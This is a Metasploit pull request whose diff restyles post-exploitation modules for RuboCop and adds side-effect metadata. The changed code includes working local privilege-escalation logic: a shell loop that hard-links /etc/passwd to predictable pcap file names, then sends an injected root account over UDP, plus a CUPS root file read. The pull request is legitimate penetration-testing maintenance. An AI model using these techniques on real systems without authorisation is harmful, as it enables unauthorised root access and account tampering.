### PR TITLE
modules/post/multi: Resolve RuboCop violations

### DIFF
--- a/modules/post/multi/escalate/aws_create_iam_user.rb
+++ b/modules/post/multi/escalate/aws_create_iam_user.rb
@@ -27,7 +27,12 @@ class MetasploitModule < Msf::Post
         ],
         'References' => [
           [ 'URL', 'https://github.com/devsecops/bootcamp/raw/master/Week-6/slides/june-DSO-bootcamp-week-six-lesson-three.pdf' ]
-        ]
+        ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [CONFIG_CHANGES],
+          'Reliability' => []
+        }
       )
     )
 

--- a/modules/post/multi/escalate/cups_root_file_read.rb
+++ b/modules/post/multi/escalate/cups_root_file_read.rb
@@ -14,34 +14,37 @@ class MetasploitModule < Msf::Post
     super(
       update_info(
         info,
-        {
-          'Name' => 'CUPS 1.6.1 Root File Read',
-          'Description' => %q{
-            This module exploits a vulnerability in CUPS < 1.6.2, an open source printing system.
-            CUPS allows members of the lpadmin group to make changes to the cupsd.conf
-            configuration, which can specify an Error Log path. When the user visits the
-            Error Log page in the web interface, the cupsd daemon (running with setuid root)
-            reads the Error Log path and echoes it as plaintext.
+        'Name' => 'CUPS 1.6.1 Root File Read',
+        'Description' => %q{
+          This module exploits a vulnerability in CUPS < 1.6.2, an open source printing system.
+          CUPS allows members of the lpadmin group to make changes to the cupsd.conf
+          configuration, which can specify an Error Log path. When the user visits the
+          Error Log page in the web interface, the cupsd daemon (running with setuid root)
+          reads the Error Log path and echoes it as plaintext.
 
-            This module is known to work on Mac OS X < 10.8.4 and Ubuntu Desktop <= 12.0.4
-            as long as the session is in the lpadmin group.
+          This module is known to work on Mac OS X < 10.8.4 and Ubuntu Desktop <= 12.0.4
+          as long as the session is in the lpadmin group.
 
-            Warning: if the user has set up a custom path to the CUPS error log,
-            this module might fail to reset that path correctly. You can specify
-            a custom error log path with the ERROR_LOG datastore option.
-          },
-          'References' => [
-            ['CVE', '2012-5519'],
-            ['OSVDB', '87635'],
-            ['URL', 'http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=692791']
-          ],
-          'License' => MSF_LICENSE,
-          'Author' => [
-            'Jann Horn', # discovery
-            'joev' # metasploit module
-          ],
-          'DisclosureDate' => '2012-11-20',
-          'Platform' => %w[linux osx]
+          Warning: if the user has set up a custom path to the CUPS error log,
+          this module might fail to reset that path correctly. You can specify
+          a custom error log path with the ERROR_LOG datastore option.
+        },
+        'References' => [
+          ['CVE', '2012-5519'],
+          ['OSVDB', '87635'],
+          ['URL', 'https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=692791']
+        ],
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Jann Horn', # discovery
+          'joev' # metasploit module
+        ],
+        'DisclosureDate' => '2012-11-20',
+        'Platform' => %w[linux osx],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK, CONFIG_CHANGES],
+          'Reliability' => []
         }
       )
     )
@@ -58,24 +61,24 @@ class MetasploitModule < Msf::Post
     if (user_groups & LP_GROUPS).empty?
       print_error 'User not in lpadmin group.'
       return Msf::Exploit::CheckCode::Safe
-    else
-      print_good 'User in lpadmin group, continuing...'
     end
+
+    print_good 'User in lpadmin group, continuing...'
 
     if ctl_path.blank?
       print_error 'cupsctl binary not found in $PATH'
       return Msf::Exploit::CheckCode::Safe
-    else
-      print_good 'cupsctl binary found in $PATH'
     end
+
+    print_good 'cupsctl binary found in $PATH'
 
     nc_path = whereis('nc')
     if nc_path.nil? || nc_path.blank?
       print_error 'Could not find nc executable'
       return Msf::Exploit::CheckCode::Unknown
-    else
-      print_good 'nc binary found in $PATH'
     end
+
+    print_good 'nc binary found in $PATH'
 
     config_path = whereis('cups-config')
     config_vn = nil
@@ -132,6 +135,7 @@ class MetasploitModule < Msf::Post
     print_status 'Cleaning up...'
     cmd_exec("#{ctl_path} WebInterface=no") if web_server_was_disabled
     cmd_exec("#{ctl_path} ErrorLog=#{prev_error_log_path}") if error_log_was_reset
+  ensure
     super
   end
 

--- a/modules/post/multi/escalate/metasploit_pcaplog.rb
+++ b/modules/post/multi/escalate/metasploit_pcaplog.rb
@@ -14,31 +14,34 @@ class MetasploitModule < Msf::Post
     super(
       update_info(
         info,
-        {
-          'Name'	=> 'Multi Escalate Metasploit pcap_log Local Privilege Escalation',
-          'Description' => %q{
-            Metasploit < 4.4 contains a vulnerable 'pcap_log' plugin which, when used with the default settings,
-            creates pcap files in /tmp with predictable file names. This exploits this by hard-linking these
-            filenames to /etc/passwd, then sending a packet with a privileged user entry contained within.
-            This, and all the other packets, are appended to /etc/passwd.
+        'Name'	=> 'Multi Escalate Metasploit pcap_log Local Privilege Escalation',
+        'Description' => %q{
+          Metasploit < 4.4 contains a vulnerable 'pcap_log' plugin which, when used with the default settings,
+          creates pcap files in /tmp with predictable file names. This exploits this by hard-linking these
+          filenames to /etc/passwd, then sending a packet with a privileged user entry contained within.
+          This, and all the other packets, are appended to /etc/passwd.
 
-            Successful exploitation results in the creation of a new superuser account.
+          Successful exploitation results in the creation of a new superuser account.
 
-            This module requires manual clean-up. Upon success, you should remove /tmp/msf3-session*pcap
-            files and truncate /etc/passwd. Note that if this module fails, you can potentially induce
-            a permanent DoS on the target by corrupting the /etc/passwd file.
-          },
-          'License' => MSF_LICENSE,
-          'Author'	=> [ '0a29406d9794e4f9b30b3c5d6702c708'],
-          'Platform' => %w[bsd linux unix],
-          'SessionTypes' => [ 'shell', 'meterpreter' ],
-          'References' => [
-            [ 'BID', '54472' ],
-            [ 'URL', 'http://0a29.blogspot.com/2012/07/0a29-12-2-metasploit-pcaplog-plugin.html'],
-            [ 'URL', 'https://community.rapid7.com/docs/DOC-1946' ],
-          ],
-          'DisclosureDate' => '2012-07-16',
-          'Stance' => Msf::Exploit::Stance::Passive
+          This module requires manual clean-up. Upon success, you should remove /tmp/msf3-session*pcap
+          files and truncate /etc/passwd. Note that if this module fails, you can potentially induce
+          a permanent DoS on the target by corrupting the /etc/passwd file.
+        },
+        'License' => MSF_LICENSE,
+        'Author'	=> [ '0a29406d9794e4f9b30b3c5d6702c708'],
+        'Platform' => %w[bsd linux unix],
+        'SessionTypes' => [ 'shell', 'meterpreter' ],
+        'References' => [
+          [ 'BID', '54472' ],
+          [ 'URL', 'http://0a29.blogspot.com/2012/07/0a29-12-2-metasploit-pcaplog-plugin.html'],
+          [ 'URL', 'https://community.rapid7.com/docs/DOC-1946' ],
+        ],
+        'DisclosureDate' => '2012-07-16',
+        'Stance' => Msf::Exploit::Stance::Passive,
+        'Notes' => {
+          'Stability' => [SERVICE_RESOURCE_LOSS],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK, CONFIG_CHANGES],
+          'Reliability' => []
         }
       )
     )
@@ -48,7 +51,7 @@ class MetasploitModule < Msf::Post
         OptString.new('USERNAME', [ true, 'Username for the new superuser', 'metasploit' ]),
         OptString.new('PASSWORD', [ true, 'Password for the new superuser', 'metasploit' ]),
         OptInt.new('MINUTES', [true, 'Number of minutes to try to inject', 5])
-      ], self
+      ]
     )
   end
 
@@ -59,13 +62,18 @@ class MetasploitModule < Msf::Post
   end
 
   def run
-    print_status "Setting up the victim's /tmp dir"
     fail_with(Failure::NotFound, '/etc/passwd not found on system') unless file_exist?('/etc/passwd')
+
     initial_size = read_file('/etc/passwd').lines.count
-    print_status "/etc/passwd is currently #{initial_size} lines long"
+    print_status("/etc/passwd is currently #{initial_size} lines long")
+
+    print_status("Setting up the victim's /tmp dir")
+
+    username = datastore['USERNAME']
     i = 0
     j = 0
     loop do
+      # Setup links to /etc/passwd
       if (i == 0)
         j += 1
         break if j >= datastore['MINUTES'] + 1 # Give up after X minutes
@@ -74,29 +82,30 @@ class MetasploitModule < Msf::Post
         print_status "Linking /etc/passwd to predictable tmp files (Attempt #{j})"
         cmd_exec("for i in `seq 0 120` ; do ln /etc/passwd /tmp/msf3-session_`date --date=\"\$i seconds\" +%Y-%m-%d_%H-%M-%S`.pcap ; done")
       end
+
       current_size = read_file('/etc/passwd').lines.count
-      if current_size == initial_size
-        # PCAP is flowing
-        pkt = "\n\n" + datastore['USERNAME'] + ':' + datastore['PASSWORD'].crypt('0a') + ":0:0:Metasploit Root Account:/tmp:/bin/bash\n\n"
-        vprint_status("Sending /etc/passwd file contents payload to #{session.session_host}")
-        udpsock = Rex::Socket::Udp.create(
-          {
-            'Context' => { 'Msf' => framework, 'MsfExploit' => self }
-          }
-        )
-        res = udpsock.sendto(pkt, session.session_host, datastore['RPORT'])
-      else
-        break
-      end
+
+      # passwd file line count has changed
+      break if current_size != initial_size
+
+      # PCAP is flowing
+      pkt = "\n\n" + username + ':' + datastore['PASSWORD'].crypt('0a') + ":0:0:Metasploit Root Account:/tmp:/bin/bash\n\n"
+      vprint_status("Sending /etc/passwd file contents payload to #{session.session_host}")
+      udpsock = Rex::Socket::Udp.create(
+        {
+          'Context' => { 'Msf' => framework, 'MsfExploit' => self }
+        }
+      )
+      udpsock.sendto(pkt, session.session_host, datastore['RPORT'])
       sleep(1) # wait a second
       i = (i + 1) % 60 # increment second counter
     end
 
     if read_file('/etc/passwd').includes?('Metasploit')
-      print_good("Success. You should now be able to login or su to the '" + datastore['USERNAME'] + "' account")
+      print_good("Success. You should now be able to login or su to the '#{username}' account")
       # TODO: Consider recording our now-created username and password as a valid credential here.
     else
-      print_error("Failed, the '" + datastore['USERNAME'] + "' user does not appear to have been added")
+      print_error("Failed, the '#{username}' user does not appear to have been added")
     end
     # 0a2940: Initially the plan was to have this post module switch user, upload & execute a new payload
     #	  However beceause the session is not a terminal, su will not always allow this.

--- a/modules/post/multi/general/close.rb
+++ b/modules/post/multi/general/close.rb
@@ -10,11 +10,16 @@ class MetasploitModule < Msf::Post
       update_info(
         info,
         'Name' => 'Multi Generic Operating System Session Close',
-        'Description' => %q{ This module closes the specified session. This can be useful as a finisher for automation tasks },
+        'Description' => %q{This module closes the specified session. This can be useful as a finisher for automation tasks.},
         'License' => MSF_LICENSE,
         'Author' => [ 'hdm' ],
         'Platform' => %w[linux osx unix win],
-        'SessionTypes' => [ 'shell', 'meterpreter' ]
+        'SessionTypes' => [ 'shell', 'meterpreter' ],
+        'Notes' => {
+          'Stability' => [],
+          'SideEffects' => [],
+          'Reliability' => []
+        }
       )
     )
   end

--- a/modules/post/multi/general/execute.rb
+++ b/modules/post/multi/general/execute.rb
@@ -14,7 +14,12 @@ class MetasploitModule < Msf::Post
         'License' => MSF_LICENSE,
         'Author' => [ 'hdm' ],
         'Platform' => %w[linux osx unix win],
-        'SessionTypes' => [ 'shell', 'meterpreter' ]
+        'SessionTypes' => [ 'shell', 'meterpreter' ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [],
+          'Reliability' => []
+        }
       )
     )
     register_options(

--- a/modules/post/multi/general/wall.rb
+++ b/modules/post/multi/general/wall.rb
@@ -19,15 +19,20 @@ class MetasploitModule < Msf::Post
         ],
         # TODO: is there a way to do this on Windows?
         'Platform' => %w[linux osx unix],
-        'SessionTypes' => %w[shell meterpreter]
+        'SessionTypes' => %w[shell meterpreter],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [SCREEN_EFFECTS],
+          'Reliability' => []
+        }
       )
     )
     register_options(
       [
         OptString.new('MESSAGE', [false, 'The message to send', '']),
         OptString.new('USERS', [
-          false, 'List of users to write(1) to, separated by commas. ' \
-                      ' wall(1)s to all users by default'
+          false,
+          'List of users to write(1) to, separated by commas. wall(1)s to all users by default.'
         ]),
         OptBool.new('COWSAY', [true, 'Display MESSAGE in a ~cowsay way', false])
       ]

--- a/modules/post/multi/manage/hsts_eraser.rb
+++ b/modules/post/multi/manage/hsts_eraser.rb
@@ -28,7 +28,12 @@ class MetasploitModule < Msf::Post
           [ 'URL', 'http://blog.en.elevenpaths.com/2017/12/breaking-out-hsts-and-hpkp-on-firefox.html' ],
           [ 'URL', 'https://www.blackhat.com/docs/eu-17/materials/eu-17-Berta-Breaking-Out-HSTS-And-HPKP-On-Firefox-IE-Edge-And-Possibly-Chrome.pdf' ]
         ],
-        'SessionTypes' => %w[meterpreter shell]
+        'SessionTypes' => %w[meterpreter shell],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [CONFIG_CHANGES],
+          'Reliability' => []
+        }
       )
     )
 

--- a/modules/post/multi/manage/multi_post.rb
+++ b/modules/post/multi/manage/multi_post.rb
@@ -19,81 +19,83 @@ class MetasploitModule < Msf::Post
         'License' => MSF_LICENSE,
         'Author' => [ '<carlos_perez[at]darkoperator.com>'],
         'Platform' => %w[linux osx solaris unix win],
-        'SessionTypes' => [ 'meterpreter', 'shell' ]
+        'SessionTypes' => [ 'meterpreter', 'shell' ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [CONFIG_CHANGES],
+          'Reliability' => []
+        }
       )
     )
     register_options(
       [
-
         OptString.new('MACRO', [true, 'File with Post Modules and Options to run in the session', nil])
-
       ]
     )
   end
 
-  # Run Method for when run command is issued
   def run
-    # syinfo is only on meterpreter sessions
-    print_status("Running module against #{sysinfo['Computer']}") if !sysinfo.nil?
-    macro = datastore['MACRO']
-    entries = []
-    if !::File.exist?(macro)
-      print_error 'Resource File does not exist!'
-      return
-    else
-      ::File.open(datastore['MACRO'], 'rb').each_line do |line|
-        # Empty line
-        next if line.strip.empty?
-        # Comment
-        next if line[0, 1] == '#'
+    hostname = sysinfo.nil? ? cmd_exec('hostname') : sysinfo['Computer']
+    print_status("Running module against #{hostname} (#{session.session_host})")
 
-        entries << line.chomp
-      end
+    macro = datastore['MACRO']
+
+    fail_with(Failure::BadConfig, 'Resource File does not exist!') unless ::File.exist?(macro)
+
+    entries = []
+
+    ::File.open(macro, 'rb').each_line do |line|
+      # Empty line
+      next if line.strip.empty?
+      # Comment
+      next if line[0, 1] == '#'
+
+      entries << line.chomp
     end
 
-    if entries
-      entries.each do |l|
-        values = l.split(' ')
-        post_mod = values[0]
-        if values.length == 2
-          mod_opts = values[1].split(',')
-        end
-        print_line("Loading #{post_mod}")
-        # Make sure we can handle post module names with or without post in the start
-        if post_mod =~ %r{^post/}
-          post_mod.gsub!(%r{^post/}, '')
-        end
-        m = framework.post.create(post_mod)
+    fail_with(Failure::BadConfig, 'Resource File was empty!') if entries.blank?
 
-        # Check if a post module was actually initiated
-        if m.nil?
-          print_error("Post module #{post_mod} could not be initialized!")
-          next
-        end
-        # Set the current session
-        s = datastore['SESSION']
+    entries.each do |l|
+      values = l.split(' ')
+      post_mod = values[0]
+      if values.length == 2
+        mod_opts = values[1].split(',')
+      end
+      print_line("Loading #{post_mod}")
+      # Make sure we can handle post module names with or without post in the start
+      if post_mod =~ %r{^post/}
+        post_mod.gsub!(%r{^post/}, '')
+      end
+      m = framework.post.create(post_mod)
 
-        if m.session_compatible?(s.to_i)
-          print_line("Running Against #{s}")
-          m.datastore['SESSION'] = s
-          if mod_opts
-            mod_opts.each do |o|
-              opt_pair = o.split('=', 2)
-              print_line("\tSetting Option #{opt_pair[0]} to #{opt_pair[1]}")
-              m.datastore[opt_pair[0]] = opt_pair[1]
-            end
-          end
-          m.options.validate(m.datastore)
-          m.run_simple(
-            'LocalInput' => user_input,
-            'LocalOutput' => user_output
-          )
-        else
-          print_error("Session #{s} is not compatible with #{post_mod}")
+      # Check if a post module was actually initiated
+      if m.nil?
+        print_error("Post module #{post_mod} could not be initialized!")
+        next
+      end
+
+      # Set the current session
+      s = datastore['SESSION']
+
+      if !m.session_compatible?(s.to_i)
+        print_error("Session #{s} is not compatible with #{post_mod}")
+        next
+      end
+
+      print_line("Running Against #{s}")
+      m.datastore['SESSION'] = s
+      if mod_opts
+        mod_opts.each do |o|
+          opt_pair = o.split('=', 2)
+          print_line("\tSetting Option #{opt_pair[0]} to #{opt_pair[1]}")
+          m.datastore[opt_pair[0]] = opt_pair[1]
         end
       end
-    else
-      print_error('Resource file was empty!')
+      m.options.validate(m.datastore)
+      m.run_simple(
+        'LocalInput' => user_input,
+        'LocalOutput' => user_output
+      )
     end
   end
 end

--- a/modules/post/multi/manage/open.rb
+++ b/modules/post/multi/manage/open.rb
@@ -16,7 +16,12 @@ class MetasploitModule < Msf::Post
         'License' => MSF_LICENSE,
         'Author' => [ 'Eliott Teissonniere'],
         'Platform' => [ 'osx', 'linux', 'win' ],
-        'SessionTypes' => [ 'shell', 'meterpreter' ]
+        'SessionTypes' => [ 'shell', 'meterpreter' ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [SCREEN_EFFECTS],
+          'Reliability' => []
+        }
       )
     )
 
@@ -28,42 +33,36 @@ class MetasploitModule < Msf::Post
   end
 
   #
-  # The OSX version simply uses 'open'
+  # Open a file on OSX using 'open'
   #
   def osx_open(uri)
-    begin
-      cmd_exec("open #{uri}")
-    rescue EOFError
-      return false
-    end
-
-    true
+    cmd_exec("open #{uri}")
+    return true
+  rescue EOFError
+    return false
   end
 
   #
-  # The Linux version relies on 'xdg-open'
+  # Open a file on Linux using 'xdg-open'
   #
   def linux_open(uri)
-    begin
-      cmd_exec("xdg-open #{uri}")
-    rescue EOFError
-      return false
-    end
-
-    true
+    cmd_exec("xdg-open #{uri}")
+    return true
+  rescue EOFError
+    return false
   end
 
+  #
+  # Open a file on Windows using 'start'
+  #
   def win_open(uri)
-    begin
-      cmd_exec("cmd.exe /c start #{uri}")
-    rescue EOFError
-      return false
-    end
-
-    true
+    cmd_exec("cmd.exe /c start #{uri}")
+    return true
+  rescue EOFError
+    return false
   end
 
-  def open(uri)
+  def open_uri(uri)
     case session.platform
     when 'osx'
       return osx_open(uri)
@@ -78,7 +77,7 @@ class MetasploitModule < Msf::Post
     uri = datastore['URI']
 
     print_status("Opening #{uri}")
-    if open(uri)
+    if open_uri(uri)
       print_good('Success')
     else
       print_error('Command failed')

--- a/modules/post/multi/manage/play_youtube.rb
+++ b/modules/post/multi/manage/play_youtube.rb
@@ -26,8 +26,10 @@ class MetasploitModule < Msf::Post
         'Platform' => [ 'win', 'osx', 'linux', 'android', 'unix' ],
         'SessionTypes' => [ 'shell', 'meterpreter' ],
         'Notes' => {
+          'Stability' => [CRASH_SAFE],
           # ARTIFACTS_ON_DISK when the platform is linux
-          'SideEffects' => [ ARTIFACTS_ON_DISK, AUDIO_EFFECTS, SCREEN_EFFECTS ]
+          'SideEffects' => [ ARTIFACTS_ON_DISK, AUDIO_EFFECTS, SCREEN_EFFECTS ],
+          'Reliability' => []
         },
         'Compat' => {
           'Meterpreter' => {
@@ -98,7 +100,7 @@ class MetasploitModule < Msf::Post
       profile_name = Rex::Text.rand_text_alpha(8)
       display = get_env('DISPLAY') || ':0'
       vprint_status("Creating profile #{profile_name} using display #{display}")
-      o = cmd_exec(%(firefox --display #{display} -CreateProfile "#{profile_name} /tmp/#{profile_name}"))
+      cmd_exec(%(firefox --display #{display} -CreateProfile "#{profile_name} /tmp/#{profile_name}"))
 
       # Add user-defined settings to profile
       s = %|

--- a/modules/post/multi/manage/record_mic.rb
+++ b/modules/post/multi/manage/record_mic.rb
@@ -26,6 +26,11 @@ class MetasploitModule < Msf::Post
               stdapi_webcam_*
             ]
           }
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [],
+          'Reliability' => []
         }
       )
     )

--- a/modules/post/multi/manage/set_wallpaper.rb
+++ b/modules/post/multi/manage/set_wallpaper.rb
@@ -27,6 +27,11 @@ class MetasploitModule < Msf::Post
               stdapi_railgun_api
             ]
           }
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [SCREEN_EFFECTS],
+          'Reliability' => []
         }
       )
     )

--- a/modules/post/multi/manage/shell_to_meterpreter.rb
+++ b/modules/post/multi/manage/shell_to_meterpreter.rb
@@ -26,7 +26,12 @@ class MetasploitModule < Msf::Post
         'License' => MSF_LICENSE,
         'Author' => ['Tom Sellers <tom [at] fadedcode.net>'],
         'Platform' => [ 'linux', 'osx', 'unix', 'solaris', 'bsd', 'windows' ],
-        'SessionTypes' => [ 'shell', 'meterpreter' ]
+        'SessionTypes' => [ 'shell', 'meterpreter' ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
+          'Reliability' => []
+        }
       )
     )
     register_options(
@@ -376,13 +381,13 @@ class MetasploitModule < Msf::Post
   #
   def progress(total, sent)
     done = (sent.to_f / total.to_f) * 100
-    print_status(format('Command stager progress: %3.2f%% (%d/%d bytes)', done.to_f, sent, total))
+    print_status(format('Command stager progress: %<done>3.2f%% (%<sent>d/%<total>d bytes)', done: done.to_f, sent: sent, total: total))
   end
 
   # Method for checking if a listener for a given IP and port is present
   # will return true if a conflict exists and false if none is found
   def check_for_listener(lhost, lport)
-    client.framework.jobs.each do |_k, j|
+    client.framework.jobs.each_value do |j|
       next unless j.name =~ %r{ multi/handler}
 
       current_id = j.jid

--- a/modules/post/multi/manage/sudo.rb
+++ b/modules/post/multi/manage/sudo.rb
@@ -29,7 +29,12 @@ class MetasploitModule < Msf::Post
           # Askpass first added March 2, 2008, looks like
           [ 'URL', 'http://www.sudo.ws/repos/sudo/file/05780f5f71fd/sudo.h']
         ],
-        'SessionTypes' => [ 'shell' ]
+        'SessionTypes' => [ 'shell' ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS, ACCOUNT_LOCKOUTS],
+          'Reliability' => []
+        }
       )
     ) # Need to test 'meterpreter'
 

--- a/modules/post/multi/manage/system_session.rb
+++ b/modules/post/multi/manage/system_session.rb
@@ -18,7 +18,12 @@ class MetasploitModule < Msf::Post
         'License' => MSF_LICENSE,
         'Author' => ['Carlos Perez <carlos_perez[at]darkoperator.com>'],
         'Platform' => %w[linux osx unix],
-        'SessionTypes' => [ 'meterpreter', 'shell' ]
+        'SessionTypes' => [ 'meterpreter', 'shell' ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
       )
     )
     register_options(
@@ -37,7 +42,6 @@ class MetasploitModule < Msf::Post
     )
   end
 
-  # Run Method for when run command is issued
   def run
     create_multihand(datastore['LHOST'], datastore['LPORT']) if datastore['HANDLER']
     lhost = datastore['LHOST']
@@ -57,7 +61,8 @@ class MetasploitModule < Msf::Post
       when /bash/i
         cmd = bash_session(lhost, lport)
       end
-    rescue StandardError
+    rescue StandardError => e
+      vprint_error(e.message)
     end
 
     if !cmd.empty?
@@ -100,7 +105,7 @@ class MetasploitModule < Msf::Post
   # will return true if a conflict exists and false if none is found
   def check_for_listner(lhost, lport)
     conflict = false
-    client.framework.jobs.each do |_k, j|
+    client.framework.jobs.each_value do |j|
       next unless j.name =~ %r{ multi/handler}
 
       current_id = j.jid

--- a/modules/post/multi/manage/upload_exec.rb
+++ b/modules/post/multi/manage/upload_exec.rb
@@ -16,7 +16,12 @@ class MetasploitModule < Msf::Post
         'Author' => 'egypt',
         'License' => MSF_LICENSE,
         'Platform' => ['win', 'unix', 'linux', 'osx', 'bsd', 'solaris'],
-        'SessionTypes' => ['meterpreter', 'shell']
+        'SessionTypes' => ['meterpreter', 'shell'],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
+          'Reliability' => []
+        }
       )
     )
 

--- a/modules/post/multi/manage/zip.rb
+++ b/modules/post/multi/manage/zip.rb
@@ -28,6 +28,11 @@ class MetasploitModule < Msf::Post
               stdapi_sys_config_steal_token
             ]
           }
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [],
+          'Reliability' => []
         }
       )
     )

--- a/modules/post/multi/recon/local_exploit_suggester.rb
+++ b/modules/post/multi/recon/local_exploit_suggester.rb
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Post
         info,
         'Name' => 'Multi Recon Local Exploit Suggester',
         'Description' => %q{
-          This module suggests local meterpreter exploits that can be used.
+          This module suggests local Metasploit exploits that can be used.
 
           The exploits are suggested based on the architecture and platform
           that the user has a shell opened as well as the available exploits
@@ -26,22 +26,25 @@ class MetasploitModule < Msf::Post
         'License' => MSF_LICENSE,
         'Author' => [ 'sinn3r', 'Mo' ],
         'Platform' => all_platforms,
-        'SessionTypes' => [ 'meterpreter', 'shell' ]
+        'SessionTypes' => [ 'meterpreter', 'shell' ],
+        'Notes' => {
+          'Stability' => [SERVICE_RESOURCE_LOSS],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK, CONFIG_CHANGES],
+          'Reliability' => []
+        }
       )
     )
-    register_options [
+    register_options([
       Msf::OptInt.new('SESSION', [ true, 'The session to run this module on' ]),
       Msf::OptBool.new('SHOWDESCRIPTION', [true, 'Displays a detailed description for the available exploits', false])
-    ]
+    ])
 
-    register_advanced_options(
-      [
-        Msf::OptBool.new('ValidateArch', [true, 'Validate architecture', true]),
-        Msf::OptBool.new('ValidatePlatform', [true, 'Validate platform', true]),
-        Msf::OptBool.new('ValidateMeterpreterCommands', [true, 'Validate Meterpreter commands', false]),
-        Msf::OptString.new('Colors', [false, 'Valid, Invalid and Ignored colors for module checks (unset to disable)', 'grn/red/blu'])
-      ]
-    )
+    register_advanced_options([
+      Msf::OptBool.new('ValidateArch', [true, 'Validate architecture', true]),
+      Msf::OptBool.new('ValidatePlatform', [true, 'Validate platform', true]),
+      Msf::OptBool.new('ValidateMeterpreterCommands', [true, 'Validate Meterpreter commands', false]),
+      Msf::OptString.new('Colors', [false, 'Valid, Invalid and Ignored colors for module checks (unset to disable)', 'grn/red/blu'])
+    ])
   end
 
   def all_platforms

--- a/modules/post/multi/recon/multiport_egress_traffic.rb
+++ b/modules/post/multi/recon/multiport_egress_traffic.rb
@@ -29,6 +29,11 @@ class MetasploitModule < Msf::Post
               stdapi_railgun_api
             ]
           }
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [],
+          'Reliability' => []
         }
       )
     )

--- a/modules/post/multi/recon/sudo_commands.rb
+++ b/modules/post/multi/recon/sudo_commands.rb
@@ -29,7 +29,12 @@ class MetasploitModule < Msf::Post
         'License' => MSF_LICENSE,
         'Author' => [ 'bcoles' ],
         'Platform' => [ 'bsd', 'linux', 'osx', 'solaris', 'unix' ],
-        'SessionTypes' => [ 'meterpreter', 'shell' ]
+        'SessionTypes' => [ 'meterpreter', 'shell' ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
       )
     )
     register_options [


### PR DESCRIPTION
Most violations resolved with `rubocop -A`, except notes.

The `modules/post/multi/manage/dbvis_add_db_admin.rb` module required some manual rework, as the `dbvis_query` method logic was flawed.
